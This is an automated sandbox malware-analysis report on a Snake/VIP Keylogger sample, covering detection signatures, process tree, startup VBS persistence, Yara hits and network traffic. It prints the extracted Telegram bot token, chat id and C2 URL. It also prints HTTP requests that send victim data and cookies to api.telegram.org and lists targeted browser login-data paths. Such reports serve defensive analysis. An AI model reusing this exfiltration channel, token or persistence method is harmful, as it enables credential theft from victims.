Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6BRa130JDj.exe

Overview

General Information

Sample name:6BRa130JDj.exe
renamed because original name is a hash value
Original sample name:e036b840f2d4ce7a8e097d3f8309d2363239f837936161ffb9527cec62987f87.exe
Analysis ID:1588367
MD5:cb47b81059d6e0b15ad2ab00c3491c48
SHA1:4cf91a5e49a4d17f2c0d35bc52dee15ecdf155dc
SHA256:e036b840f2d4ce7a8e097d3f8309d2363239f837936161ffb9527cec62987f87
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 6BRa130JDj.exe (PID: 4824 cmdline: "C:\Users\user\Desktop\6BRa130JDj.exe" MD5: CB47B81059D6E0B15AD2AB00C3491C48)
    • ectosphere.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\6BRa130JDj.exe" MD5: CB47B81059D6E0B15AD2AB00C3491C48)
      • RegSvcs.exe (PID: 2804 cmdline: "C:\Users\user\Desktop\6BRa130JDj.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5428 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ectosphere.exe (PID: 2920 cmdline: "C:\Users\user\AppData\Local\Allene\ectosphere.exe" MD5: CB47B81059D6E0B15AD2AB00C3491C48)
      • RegSvcs.exe (PID: 6148 cmdline: "C:\Users\user\AppData\Local\Allene\ectosphere.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg", "Chat id": "1886630858", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg", "Chat_id": "1886630858", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000003.00000002.4526688861.0000000000423000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xcec4:$a1: get_encryptedPassword
        • 0xd1e1:$a2: get_encryptedUsername
        • 0xccd4:$a3: get_timePasswordChanged
        • 0xcddd:$a4: get_passwordField
        • 0xceda:$a5: set_encryptedPassword
        • 0xe54a:$a7: get_logins
        • 0xe4ad:$a10: KeyLoggerEventArgs
        • 0xe112:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.4526688861.000000000043A000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 31 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                3.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2e0c4:$a1: get_encryptedPassword
                • 0x2e3e1:$a2: get_encryptedUsername
                • 0x2ded4:$a3: get_timePasswordChanged
                • 0x2dfdd:$a4: get_passwordField
                • 0x2e0da:$a5: set_encryptedPassword
                • 0x2f74a:$a7: get_logins
                • 0x2f6ad:$a10: KeyLoggerEventArgs
                • 0x2f312:$a11: KeyLoggerEventArgsEventHandler
                3.2.RegSvcs.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3be57:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3b4fa:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x3b757:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3c136:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 27 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs" , ProcessId: 5428, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs" , ProcessId: 5428, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Allene\ectosphere.exe, ProcessId: 2848, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:27:44.030882+010028033053Unknown Traffic192.168.2.549706104.21.80.1443TCP
                2025-01-11T01:27:52.052474+010028033053Unknown Traffic192.168.2.549730104.21.80.1443TCP
                2025-01-11T01:27:59.327823+010028033053Unknown Traffic192.168.2.555420104.21.80.1443TCP
                2025-01-11T01:28:00.629747+010028033053Unknown Traffic192.168.2.555431104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:27:42.543737+010028032742Potentially Bad Traffic192.168.2.549704193.122.6.16880TCP
                2025-01-11T01:27:43.449972+010028032742Potentially Bad Traffic192.168.2.549704193.122.6.16880TCP
                2025-01-11T01:27:44.715728+010028032742Potentially Bad Traffic192.168.2.549707193.122.6.16880TCP
                2025-01-11T01:27:57.856250+010028032742Potentially Bad Traffic192.168.2.555408193.122.6.16880TCP
                2025-01-11T01:27:58.731232+010028032742Potentially Bad Traffic192.168.2.555408193.122.6.16880TCP
                2025-01-11T01:28:00.045467+010028032742Potentially Bad Traffic192.168.2.555426193.122.6.16880TCP
                2025-01-11T01:28:01.328649+010028032742Potentially Bad Traffic192.168.2.555438193.122.6.16880TCP
                2025-01-11T01:28:02.637495+010028032742Potentially Bad Traffic192.168.2.555446193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:28:00.809278+010018100081Potentially Bad Traffic192.168.2.555432149.154.167.220443TCP
                2025-01-11T01:28:15.302844+010018100081Potentially Bad Traffic192.168.2.555539149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:27:54.453173+010018100071Potentially Bad Traffic192.168.2.549749149.154.167.220443TCP
                2025-01-11T01:28:09.331890+010018100071Potentially Bad Traffic192.168.2.555499149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg", "Chat_id": "1886630858", "Version": "4.4"}
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg", "Chat id": "1886630858", "Version": "4.4"}
                Source: RegSvcs.exe.6148.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendMessage"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeReversingLabs: Detection: 75%
                Multi AV Scanner detection for submitted file
                Source: 6BRa130JDj.exeReversingLabs: Detection: 75%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: 6BRa130JDj.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: 6BRa130JDj.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49705 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:55414 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:55499 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: ectosphere.exe, 00000002.00000003.2129514544.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000002.00000003.2129732590.0000000003880000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2283695508.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2285547313.00000000043C0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ectosphere.exe, 00000002.00000003.2129514544.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000002.00000003.2129732590.0000000003880000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2283695508.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, ectosphere.exe, 00000006.00000003.2285547313.00000000043C0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0031445A
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031C6D1 FindFirstFileW,FindClose,0_2_0031C6D1
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0031C75C
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0031EF95
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0031F0F2
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0031F3F3
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003137EF
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_00313B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00313B12
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0031BCBC
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0008445A
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008C6D1 FindFirstFileW,FindClose,2_2_0008C6D1
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0008C75C
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008EF95
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0008F0F2
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008F3F3
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_000837EF
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00083B12
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0008BCBC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0124F45Dh3_2_0124F2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0124F45Dh3_2_0124F4AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0124FC19h3_2_0124F961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066E31E0h3_2_066E2DC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066EE501h3_2_066EE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066E0D0Dh3_2_066E0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066E1697h3_2_066E0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066E2C19h3_2_066E2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066EE0A9h3_2_066EDE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066EE959h3_2_066EE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066EF209h3_2_066EEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066ECF49h3_2_066ECCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066ED7F9h3_2_066ED550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066E31E0h3_2_066E2DC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066EEDB1h3_2_066EEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066EF661h3_2_066EF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_066E0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066EFAB9h3_2_066EF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066ED3A1h3_2_066ED0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066E31E0h3_2_066E310E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 066EDC51h3_2_066ED9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0189F45Dh7_2_0189F2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0189F45Dh7_2_0189F4AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0189FC19h7_2_0189F961

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49749 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:55432 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:55499 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:55539 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: global trafficTCP traffic: 192.168.2.5:55387 -> 1.1.1.1:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:32:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: POST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd326c5f9c7285Host: api.telegram.orgContent-Length: 1279
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:376483%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:42:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20376483%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7489657060:AAEq5tTUQiWuuifDLGy6qn_cJN5txd73Csg/sendDocument?chat_id=1886630858&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd326de7d68210Host: api.telegram.orgContent-Length: 1279
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:55438 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:55426 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:55408 -> 193.122.6.168:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:55446 -> 193.122.6.168:80
